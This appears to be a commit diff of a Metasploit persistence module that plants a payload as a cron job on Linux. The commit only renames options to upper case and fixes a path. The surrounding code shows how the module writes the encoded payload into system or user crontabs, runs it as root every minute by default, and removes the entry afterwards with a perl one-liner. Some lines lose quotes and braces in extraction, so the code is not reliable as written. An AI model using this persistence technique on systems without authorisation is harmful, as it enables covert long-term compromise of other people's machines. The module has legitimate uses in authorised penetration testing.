@@ -53,9 +53,9 @@ def initialize(info = {})
5353
5454 register_options (
5555 [
56- OptString . new ( 'username ' , [ false , 'User to run cron/crontab as' , 'root' ] ) ,
57- OptString . new ( 'timing ' , [ false , 'cron timing. Changing will require WfsDelay to be adjusted' , '* * * * *' ] ) ,
58- OptBool . new ( 'cleanup ' , [ true , 'delete cron entry after execution' , true ] )
56+ OptString . new ( 'USERNAME ' , [ false , 'User to run cron/crontab as' , 'root' ] ) ,
57+ OptString . new ( 'TIMING ' , [ false , 'cron timing. Changing will require WfsDelay to be adjusted' , '* * * * *' ] ) ,
58+ OptBool . new ( 'CLEANUP ' , [ true , 'delete cron entry after execution' , true ] )
5959 ] , self . class
6060 )
6161 end
@@ -68,16 +68,16 @@ def exploit
6868 cron_regex << '(\*|[0-9]|1[0-2]|\*\/[0-9]+|jan|feb|mar|apr|may|jun|jul|aug|sep|oct|nov|dec)\s+'
6969 cron_regex << '(\*\/[0-9]+|\*|[0-7]|sun|mon|tue|wed|thu|fri|sat)' # \s*
7070 # cron_regex << '(\*\/[0-9]+|\*|[0-9]+)?'
71- unless datastore [ 'timing ' ] =~ %r{#{ cron_regex }
71+ unless datastore [ 'TIMING ' ] =~ %r{#{ cron_regex }
7272 fail_with ( Failure ::BadConfig , 'Invalid timing format' )
7373 end
74- cron_entry = datastore [ 'timing ' ]
74+ cron_entry = datastore [ 'TIMING ' ]
7575 if target . name =~ /User Crontab/
76- unless user_cron_permission? ( datastore [ 'username ' ] )
76+ unless user_cron_permission? ( datastore [ 'USERNAME ' ] )
7777 fail_with ( Failure ::NoAccess , 'User denied cron via cron.deny' )
7878 end
7979 else
80- cron_entry += " #{ datastore [ 'username ' ] }
80+ cron_entry += " #{ datastore [ 'USERNAME ' ] }
8181 end
8282 flag = Rex ::Text . rand_text_alpha ( 10 )
8383 cron_entry += " #{ payload . encoded } #{ flag } # we add a flag to the end of the entry to potentially delete it later
@@ -86,7 +86,7 @@ def exploit
8686 our_entry = Rex ::Text . rand_text_alpha ( 10 )
8787 write_file ( target . opts [ 'path' ] + "/#{ our_entry } , "#{ cron_entry } \n " )
8888 vprint_good ( "Writing #{ cron_entry } #{ target . opts [ 'path' ] } #{ our_entry } )
89- if datastore [ 'cleanup ' ]
89+ if datastore [ 'CLEANUP ' ]
9090 register_file_for_cleanup ( "#{ target . opts [ 'path' ] } #{ our_entry } )
9191 end
9292 when 'System Crontab'
@@ -96,7 +96,7 @@ def exploit
9696 write_file ( file_to_clean , crontab )
9797 vprint_good ( "Writing #{ cron_entry } #{ file_to_clean } )
9898 when 'User Crontab'
99- file_to_clean = "#{ target . opts [ 'path' ] } #{ datastore [ 'username ' ] }
99+ file_to_clean = "#{ target . opts [ 'path' ] } #{ datastore [ 'USERNAME ' ] }
100100 crontab = read_file ( file_to_clean )
101101 crontab << "\n #{ cron_entry } \n "
102102 write_file ( file_to_clean , crontab )
@@ -109,7 +109,7 @@ def exploit
109109 sleep ( datastore [ 'WfsDelay' ] . to_i )
110110 # we may need to do some cleanup, no need for cron since that uses file dropper
111111 # we could run this on a on_successful_session, but we want cleanup even if it fails
112- if file_to_clean && flag && datastore [ 'cleanup ' ]
112+ if file_to_clean && flag && datastore [ 'CLEANUP ' ]
113113 print_status ( "Removing our cron entry from #{ file_to_clean } )
114114 cmd_exec ( "perl -pi -e 's/.*#{ flag } #{ file_to_clean } )
115115 if target . name == 'User Crontab' # make sure we clean out of memory
@@ -121,7 +121,7 @@ def exploit
121121 def user_cron_permission? ( user )
122122 # double check we're allowed to do cron
123123 # may also be /etc/cron.d/
124- paths = [ '/etc/' , '/etc/cron.d' ]
124+ paths = [ '/etc/' , '/etc/cron.d/ ' ]
125125 paths . each do |path |
126126 cron_auth = read_file ( "#{ path } )
127127 if cron_auth
0 commit comments